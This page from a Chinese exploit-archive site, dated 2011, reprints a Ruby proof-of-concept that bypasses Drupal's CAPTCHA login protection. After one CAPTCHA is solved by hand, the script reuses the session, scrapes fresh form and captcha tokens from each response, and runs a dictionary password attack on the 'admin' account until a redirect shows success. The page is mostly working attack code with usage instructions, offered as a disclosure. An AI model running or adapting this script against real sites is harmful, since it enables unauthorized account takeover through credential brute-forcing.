首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Drupal CAPTCHA Logic Security Flaw
来源:vfocus.net 作者:Michele 发布时间:2011-02-12   
# Drupal Captcha bruteforcing bypass

# This is a Proof Of Concept to demonstrate a logic security flow
# in the way drupal captcha is used to protect login forms
# from bruteforce. If the captcha challenge is solved, the next
# login attempts can be issued without solving any new captcha challenge.

# Usage: change URL, PATH, USERAGENT as you need.
# Change cookie, captcha_sid, captcha_token, form_build_id with the values
# you got in the html response AFTER the captcha is solved. This is needed
# in order to issue the first request as valid.
# Unique tokens will be then updated automatically .


# author: Michele "antisnatchor" Orru'

require "net/http"
require "net/https"
require "erb"
require "singleton"
require "rubygems"
require "nokogiri"


URL = 'antisnatchor.com'
PATH = '/user'
USERAGENT = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13'

# easy to enhance this reading list from a file, but this is just a PoC
USERNAME_LIST = ['admin']
PASSWD_LIST = ['test1', 'test2', 'test3', 'guessme']

# these are the session values needed to create valid http requests, after
# the reCaptcha has been solved the first time, leaving the login form
# without a new captcha challenge
cookie = "SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;"
captcha_sid = "476"
form_id = "user_login"


# these anti-XSRF tokens will change for every http response,
# so nokogiri is used to parse the html response in order to create
# the next http request with the valid anti-xsrf/captcha tokens.
# These initial values will be changed accordingly and automatically
# for each request .

captcha_token = "d853d6df05f6c6a956a46f20c8fe20aa"
form_build_id = "form-43fb0bcbcb140066a782a3fc23ab1ab7"

authenticated = false;


    @http = Net::HTTP.new(URL, 80)
    @http.use_ssl = false

     puts "+Initial xsrf token [" + form_build_id + "]"
     puts "+Initial captcha token [" + captcha_token + "]"
     puts "+Dictionary attack with [" + PASSWD_LIST.size.to_s + "] passwords"
     # I'm learning ruby :-)
     passwd_counter = 0

     while !authenticated && passwd_counter < PASSWD_LIST.size do
       puts "+Testing password [" + PASSWD_LIST[passwd_counter] + "]"

       post_data = "name=" + USERNAME_LIST[0] + "&pass=" + PASSWD_LIST[passwd_counter] + "&form_build_id=" + form_build_id +
                   "&form_id=" + form_id + "&captcha_sid="+ captcha_sid +
                   "&captcha_token=" + captcha_token + "&op=Log+in"
      @headers = {
        'Cookie' => cookie,
        'Referer' => 'http://' + URL + PATH,
        'Content-Type' => 'application/x-www-form-urlencoded',
        'User-Agent' => USERAGENT
      }

      puts "+Request headers = " + @headers.inspect

      resp, data = @http.post2(PATH, post_data, @headers)

      # loads the response in nokogiri to parse anti-XSRF tokens
      doc = Nokogiri::HTML(data)
      puts '+Code = ' + resp.code
      puts '+Message = ' + resp.message


      # "debug" code
      #puts "=================================================== raw response START ======================================================="
      #puts data
      #puts "=================================================== raw response END ======================================================="

      if data.index("CAPTCHA session reuse attack detected") != nil
        puts "Doh', we've been detected by Drupal...quitting now"
        break
      end

      if data.index("Sorry, unrecognized username or password") == nil && resp.code == "302"
        # if credentials will be valid, there will be a 302 response with
        # a new location header, corresponding to the user home page (http://antisnatchor.com/user/1 for instance)
        authenticated = true
      else
        #parse the anti-xsrf and captcha tokens from the response
        doc.css('input[id^=form]').each do |form_build_id|
          form_build_id = form_build_id['id']
          puts "+New xsrf token [" + form_build_id + "]"
        end

        doc.css('input[id^=edit-captcha-token]').each do |captcha_token_id|
          captcha_token = captcha_token_id['value']
          puts "+New captcha token [" + captcha_token + "]"
        end

        # I'm still learning ruby :-)
        passwd_counter = passwd_counter + 1;

      end
      break if authenticated == true
     end

if authenticated
  puts "+Succesfully authenticated user[" + USERNAME_LIST[0] + "] with password [" + PASSWD_LIST[passwd_counter] + "]"
else
  puts "+No passwords are valid for user [" + USERNAME_LIST[0] + "]. Dictionary attack failed."
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·LocatePC v1.05 (Ligatt Version
·Microsoft Windows CreateSizeDI
·XM Easy Personal FTP Server 5.
·Internet Explorer CSS Recursiv
·Linksys WAP610N Unauthenticate
·webERP 4.0.1 Shell Upload
·rdesktop 1.6.0 Memory Corrupti
·MoviePlay 4.82 (.lst) Buffer O
·xRadio 0.95b Local Buffer Over
·Openedit <= v5.1294 Remote Cod
·Unreal Tournament Buffer Overf
·CuteZip 2.1 Buffer Overflow Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved